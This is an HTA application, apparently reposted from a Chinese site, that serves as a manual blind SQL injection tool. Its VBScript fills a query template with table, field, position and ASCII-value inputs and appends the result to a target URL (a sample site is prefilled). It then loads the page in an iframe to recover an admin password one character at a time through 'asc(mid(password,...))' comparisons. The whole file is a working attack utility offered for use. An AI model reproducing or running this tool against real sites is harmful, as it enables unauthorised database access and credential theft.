<HEAD>
<TITLE> SQL Class Tools - By Sunhack</TITLE>
<HTA:APPLICATION
APPLICATIONNAME="Lilo"
BORDER ="dialog window"
BORDERSTYLE ="raised"
CAPTION ="yes"
ICON ="%windir%\Explorer.exe"
MAXIMIZEBUTTON ="no"
MINIMIZEBUTTON ="yes"
SHOWINTASKBAR ="YES"
INGLEINSTANCE ="no"
SYSMENU ="yes"
VERSION ="1.0"
WINDOWSTATE ="normal">
<style>body{font-size:9pt;border:0pt}input{font-size:9pt}
.textbox {BORDER-BOTTOM: #00378A 2px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid}
.vbutton {BORDER-BOTTOM: 1px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid ;
padding-top:2pt;padding-bottom:-1pt}
</style>
<Script Language="vbScript">
<!--
Sub Main
Const HEIGHT = 840
Const WIDTH = 650
window.resizeTo HEIGHT, WIDTH
window.moveTo (screen.width - HEIGHT) / 2, (screen.height - WIDTH) / 2
End Sub
Function GetStrThis()
If inURL.Value ="" Or inSQL.Value="" Or inStr(inURL.Value ,"http://") = 0 Or inURL.Value = "http://" Then Exit Function
GetStrThis= inSQL.Value
GetStrThis= Replace(GetStrThis,"[B]",inBAS.Value)
GetStrThis= Replace(GetStrThis,"[T]",inTAB.Value)
GetStrThis= Replace(GetStrThis,"[F]",inFIL.Value)
GetStrThis= Replace(GetStrThis,"[M]",inNUM.Value)
GetStrThis= Replace(GetStrThis,"[N]",inCRM.Value)
GetStrThis= Replace(inURL.Value & " " & GetStrThis & inEND.Value," "," ")
End Function
Function GoCreak_onClick()
GoWhere.Location.Href="about:blank"
GoWhere.document.write "<center><fontfont-size:9pt;color:RED''>Waitting For Open New URL...</font></center>"
GoWhere.Location.Href=GetStrThis
End Function
Function SoCreak_onClick()
Msgbox GetStrThis , 4096 ,"显示注入URL"
End Function
Function Show_onClick()
Msgbox String(23," ") & Chr(inCRM.Value) & String(25," ") , 0 ,"ASCII To CHAR"
End Function
Function Document_onClick()
''Window.Focus()
End Function
Function inENDStr()
If inEND.Value="" Then inEND.Value=" and ''''=''" Else inEND.Value=""
End Function
Function Document_onKeyPress()
If Window.Event.keyCode = 13 Then Call GoCreak_onClick()
End Function
Call Main
-->
</Script>
<Script Language="JavaScript">
function vSelect()
{ var GetThis = event.srcElement; return GetThis;}
</Script>
</HEAD>
<body scroll="no">
<Center>
地址:<input type="text" size="95" value="http://www.my-china.net/xSQL/index.asp?id=1"><BR><BR>
[B]:<input type="text" size="7" value="">
[T]:<input type="text" size="7" value="admin">
[F]:<input type="text" size="7" value="id">
[M]:<input type="text" size="7" value="1"> [N]:
<input type="text" size="7" Value="33">
<input type="button" value=" 显示ASCII ">
[W]:<input type="text" size="10" value=""> [<font color="Red">*</font>]
<br><br>
<input type="text" size="92" value="and (select top 1 [F] from [T] where [F]=1 and asc(mid(password,[M],1))>[N])">
<input type="button" value=" 尝试 ">
<input type="button" value=" 显示 ">
<br><BR>
<iframe align=center frameborder="0" width=810 height=480 scrolling=auto src="about:blank"></iframe>
</center>
文章转载地址:
(责任编辑:admin) |